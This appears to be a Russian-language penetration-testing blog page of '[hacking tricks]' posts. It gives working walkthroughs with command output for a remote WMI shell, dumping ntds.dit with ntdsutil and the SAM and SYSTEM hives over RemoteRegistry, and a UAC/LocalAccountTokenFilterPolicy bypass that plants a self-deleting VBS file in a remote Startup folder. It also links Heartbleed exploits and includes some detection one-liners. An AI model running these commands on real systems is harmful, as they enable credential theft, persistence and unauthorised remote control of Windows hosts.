[hacking tricks] AVs bypass
[hacking tricks] Полноценный WMI shell
Ознакомиться с презентацией можно по следующей ссылке [тынц].
root@bt:/tmp# wget https://www.lexsi.fr/conference/wmi-shell.zip
root@bt:/tmp# unzip wmi-shell.zip
Archive: wmi-shell.zip
creating: wmi-shell/
inflating: wmi-shell/LICENSE
inflating: wmi-shell/wmi-shell.py
inflating: wmi-shell/README
inflating: wmi-shell/base.vbs
creating: wmi-shell/bin/
inflating: wmi-shell/bin/base64.c
inflating: wmi-shell/bin/base64.exe
inflating: wmi-shell/bin/wmis
inflating: wmi-shell/bin/wmic
creating: wmi-shell/b64-source/
inflating: wmi-shell/b64-source/base64.exe
inflating: wmi-shell/b64-source/base64.c
root@bt:/tmp# cd wmi-shell/
root@bt:/tmp/wmi-shell# python wmi-shell.py administrator password 10.1.37.134
Sending our VBS script to 10.1.37.134 ETA: ~6.4 seconds.
Executed command --> ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c echo Function base64_encode( byVal strIn ) >>%TEMP%\E2BpK7z.vbs" 2>/dev/null <-- . Returned code: 1
...
Executed command --> ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c echo End Select >>%TEMP%\E2BpK7z.vbs" 2>/dev/null <-- . Returned code: 1
>>> dir C:\\
Executed command --> ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c cscript %TEMP%\E2BpK7z.vbs \"dir C:\\\"" 2>/dev/null <-- . Returned code: 1
Executed command --> ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='root\default' "select Name from __Namespace where Name like 'DOWNLOAD_READY'" > bSKFiy5_ready.tmp <-- . Returned code: 0
waiting for command output . . Executed command --> ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='root\default' "select Name from __Namespace where Name like 'DOWNLOAD_READY'" > bSKFiy5_ready.tmp <-- . Returned code: 0
. done !
Executed command --> ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='root\default' "select Name from __Namespace where Name like 'EVILTAG%'" > bSKFiy5.tmp <-- . Returned code: 0
Volume in drive C has no label.
Volume Serial Number is 8E25-9E63
Directory of C:\
14.07.2009 07:20 <DIR> PerfLogs
19.04.2014 03:12 <DIR> Program Files
19.04.2014 22:04 <DIR> Program Files (x86)
19.04.2014 03:05 <DIR> Users
20.04.2014 04:19 <DIR Windows
0 File(s) 0 bytes
5 Dir(s) 82▒326▒290▒432 bytes free
Executed command --> ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c cscript %TEMP%\E2BpK7z.vbs \"cleanup\"" 2>/dev/null <-- . Returned code: 1
>>>
[hacking tricks] Easy way to get a ntds.dit
Microsoft Windows [Версия 6.0.6001]
(C) Корпорация Майкрософт, 2006. Все права защищены.
C:\Windows\system32>ntdsutil "ac in ntds" "ifm" "cr fu c:\Windows\Temp\abc" q q
ntdsutil: ac in ntds
Активный экземпляр - "ntds".
ntdsutil: ifm
IFM: cr fu c:\Windows\Temp\abc
Создание снимка...
Успешно создан набор снимков {8d6cf811-ccd4-4dbe-9190-b911bb96196a}.
Снимок {f31648c2-0afd-4c5d-bd05-54e42debe6f1} установлен как C:\$SNAP_2014041214
02_VOLUMEC$\
Снимок {f31648c2-0afd-4c5d-bd05-54e42debe6f1} уже подключен.
Запуск режима ДЕФРАГМЕНТАЦИИ...
Исходная база данных: C:\$SNAP_201404121402_VOLUMEC$\Windows\NTDS\ntds.dit
Конечная база данных: c:\Windows\Temp\abc\Active Directory\ntds.dit
Defragmentation Status (% complete)
0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
...................................................
Копирование файлов реестра...
Копирование c:\Windows\Temp\abc\registry\SYSTEM
Копирование c:\Windows\Temp\abc\registry\SECURITY
Снимок {f31648c2-0afd-4c5d-bd05-54e42debe6f1} отключен.
Носитель IFM успешно создан в c:\Windows\Temp\abc
IFM: q
ntdsutil: q
C:\Windows\system32>
Binary backdoor in Active Directory :: Stealing passwords
CVE-2014-0160 Рабочий сплоит
https://bitbucket.org/johannestaas/heartattack/src
Полезный патч на сплоит от d0znpp: http://lab.onsec.ru/2014/04/memory-dumper-based-on-cve-2014-0160.html
+1 Heartbleed User Session Extraction: http://packetstormsecurity.com/files/126069/Heartbleed-User-Session-Extraction.html
+1 http://didierstevens.com/files/data/heartbleed_packet_capture.zip
NMAP NSE: http://seclists.org/nmap-dev/2014/q2/att-27/ssl-heartbleed.nse
MSF: https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
Чекалка уязвимости (online):
http://filippo.io/Heartbleed/ ИЛИ http://possible.lv/tools/hb/
Более продвинутая чекалка (SSL в целом и CVE-2014-0160 в частности) от Qualys: https://www.ssllabs.com/ssltest/
Heartbleed Honeypot Script: http://packetstormsecurity.com/files/126068
Detect heartbleed attacks with tshark [1]: tshark -i eth0 -R "ssl.record.content_type eq 24 and not ssl.heartbeat_message.type"
Search for processes still using old OpenSSL #heartbleed : grep -l 'libssl.*deleted' /proc/*/maps | tr -cd 0-9\\n | xargs -r ps u
Ссылки:
https://github.com/musalbas/heartbleed-masstest/blob/master/top10000.txt
http://blogs.cisco.com/security/openssl-heartbleed-vulnerability-cve-2014-0160-cisco-products-and-mitigations/
https://community.qualys.com/blogs/qualys-tech/2014/04/09/heartbleed-detection-update
[hacking tricks] LocalAccountTokenFilterPolicy bypass
Для обхода локальных ограничений безопасности UAC можно воспользоваться наработками Leo Davidson, которые затем переконтовали в удобную консольную тулу [забрать]. Стоит лишь добавить, что метод обхода локального UAC работает также и на Windows 8 со всеми обновлениями безопасности на сегодняшний день.
Microsoft Windows [Версия 6.0.6001]
(C) Корпорация Майкрософт, 2006. Все права защищены.
C:\Temp>net use \\RHOST\ADMIN$ /u:rhost\admin password
Системная ошибка 5.
Отказано в доступе.
C:\Temp>wmic /node:RHOST /user:rhost\admin /password:password process call create "cmd.exe /c ipconfig"
ERROR:
Code = 0x80070005
Description = Отказано в доступе.
Facility = Win32
C:\Temp>net use \\RHOST\ipc$ /u:rhost\admin password
Команда выполнена успешно.
C:\Temp>net view \\RHOST /all
Общие ресурсы на \\RHOST
Имя общего ресурса Тип Используется как Комментарий
-------------------------------------------------------------------------------
ADMIN$ Диск Удаленный Admin
C$ Диск Стандартный общий ресурс
IPC$ IPC (UNC) Удаленный IPC
Users Диск
Команда выполнена успешно.
C:\Temp>dir \\RHOST\Users
Том в устройстве \\RHOST\Users не имеет метки.
Серийный номер тома: 5EE0-B619
Содержимое папки \\RHOST\Users
30.03.2014 20:07 <DIR> .
30.03.2014 20:07 <DIR> ..
30.03.2014 20:00 <DIR> admin
30.03.2014 18:10 <DIR> Public
0 файлов 0 байт
4 папок 6 799 081 472 байт свободно
C:\Temp>dir "\\RHOST\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
Том в устройстве \\RHOST\Users не имеет метки.
Серийный номер тома: 5EE0-B619
Содержимое папки \\RHOST\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
30.03.2014 23:34 <DIR> .
30.03.2014 23:34 <DIR> ..
0 файлов 0 байт
2 папок 6 799 081 472 байт свободно
C:\Temp>copy /Y bypassuac.exe \\RHOST\Users\admin\AppData\Local\Temp\
Скопировано файлов: 1.
C:\Temp>type logon.vbs
On Error Resume Next
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "C:\Users\admin\AppData\Local\Temp\bypassuac.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f",0,true
Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.DeleteFile "C:\Users\admin\AppData\Local\Temp\bypassuac.exe",true
objFSO.DeleteFile "C:\Users\admin\AppData\Local\Temp\tior.exe",true
objFSO.DeleteFile Wscript.ScriptFullName,true
C:\Temp>copy /Y logon.vbs "\\RHOST\Users\admin\AppData\Roaming\Microsoft\Wi
ndows\Start Menu\Programs\Startup\"
Скопировано файлов: 1.
C:\Temp>net use \\RHOST\ipc$ /del
\\RHOST\ipc$ успешно удален.
C:\Temp> /* WAIT WAIT
C:\Temp> /* logoff/login user */
C:\Temp> WAIT */
C:\Temp>net use \\RHOST\ADMIN$ /u:rhost\admin password
Команда выполнена успешно.
C:\Temp>wmic /node:RHOST /user:rhost\admin /password:password process cal
l create "cmd.exe /c ipconfig"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 4320;
ReturnValue = 0;
};
C:\Temp>
[hacking tricks] Exec via RPC with output
[hacking tricks] Тихий pwdump
Про скрытые копии я уже говорил ранее. Этот способ отлично подходит для перетягивания содержимого адешечки. А вот для локальной базы SAM существуют и другие не менее простые варианты. Один из них представлен ниже.
net use \\RHOST\c$ /u:admin password
sc \\RHOST config RemoteRegistry start= demand
sc \\RHOST start RemoteRegistry
reg save \\RHOST\hklm\sam sam
reg save \\RHOST\hklm\system system
move \\RHOST\C$\Windows\System32\sam sam
move \\RHOST\C$\Windows\System32\system system
sc \\RHOST stop RemoteRegistry
sc \\RHOST config RemoteRegistry start= disabled
net use \\RHOST\c$ /del
[hacking tricks] Including password in runas command line
C:\Windows\System32> echo password | runas /u:user cmd